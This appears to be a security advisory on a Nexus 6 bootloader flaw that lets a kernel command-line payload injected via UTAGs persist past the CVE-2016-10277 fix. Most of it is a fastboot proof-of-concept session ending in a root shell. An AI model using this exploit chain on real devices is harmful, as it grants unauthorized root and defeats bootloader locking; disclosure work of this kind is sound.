Google Nexus 6
Android 7.1.1 NGI55D and below
The fix for CVE-2016-10277 (aka initroot) was to sanitize UTAGs (filtering ‘ ‘ and ‘=’ for example), such that the adversary cannot inject arbitrary parameters into the kernel command line.
The problem, however, is that the UTAGs, in the vulnerable versions of Android, are sanitized at the time of their modification – when the user issues the fastboot config command, and not when they are actually inserted into the command line.
Therefore, had the attack occurred before the bootloader was updated, the offending payload would remain intact:
$ fastboot getvar version-bootloader
version-bootloader: moto-apq8084-72.03
finished. total time: 0.001s
$ fastboot oem config fsg-id
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader) <value>
(bootloader) a initrd=0x11000000,1519997
(bootloader) </value>
(bootloader) <description>
(bootloader) FSG IDs, see http://goo.gl/gPmhU
(bootloader) </description>
(bootloader) </UTAG>
OKAY [ 0.009s]
finished. total time: 0.009s
$ fastboot flash a /aosp/misc/initroot.cpio.gz
target reported max download size of 536870912 bytes
sending 'a' (1484 KB)...
OKAY [ 0.048s]
writing 'a'...
(bootloader) Not allowed in LOCKED state!
FAILED (remote failure)
finished. total time: 0.051s
$ fastboot continue
resuming boot...
OKAY [ 0.001s]
finished. total time: 0.001s
$ shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0